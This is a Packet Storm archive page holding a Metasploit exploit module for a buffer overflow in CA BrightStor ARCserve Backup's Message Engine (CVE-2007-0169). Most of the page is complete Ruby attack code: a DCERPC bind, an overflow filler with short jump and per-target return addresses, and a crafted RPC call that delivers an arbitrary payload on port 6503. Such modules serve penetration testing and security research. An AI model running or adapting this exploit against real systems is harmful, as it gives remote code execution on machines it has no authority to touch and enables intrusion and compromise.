what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CA BrightStor ARCserve Message Engine Buffer Overflow

CA BrightStor ARCserve Message Engine Buffer Overflow
Posted Nov 26, 2009
Authored by patrick, MC | Site metasploit.com

This Metasploit module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup 11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.

tags | exploit, overflow, arbitrary
advisories | CVE-2007-0169
SHA-256 | 38992c01beb75cb04dd805a9bcadb1dab7921b19db704a8f59418f9d845fc536

CA BrightStor ARCserve Message Engine Buffer Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::DCERPC

def initialize(info = {})
super(update_info(info,
'Name' => 'CA BrightStor ARCserve Message Engine Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup
11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow
the buffer and execute arbitrary code.
},
'Author' => [ 'MC', 'patrick' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2007-0169' ],
[ 'OSVDB', '31318' ],
[ 'BID', '22005' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'BrightStor ARCserve r11.1', { 'Ret' => 0x23805d10 } ], #p/p/r cheyprod.dll 07/21/2004
[ 'BrightStor ARCserve r11.5', { 'Ret' => 0x2380ceb5 } ],
[ 'BrightStor ARCserve r11.5 SP2', { 'Ret' => 0x2380a47d } ],
],
'DisclosureDate' => 'Jan 11 2007',
'DefaultTarget' => 1))

register_options([ Opt::RPORT(6503) ], self.class)
end

def exploit
connect

handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")

dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

filler = rand_text_english(616) + Rex::Arch::X86.jmp_short(6) + rand_text_english(2) + [target.ret].pack('V')

sploit = NDR.string(filler + payload.encoded + "\x00") + NDR.long(0)

print_status("Trying target #{target.name}...")

begin
dcerpc_call(47, sploit)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
end

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close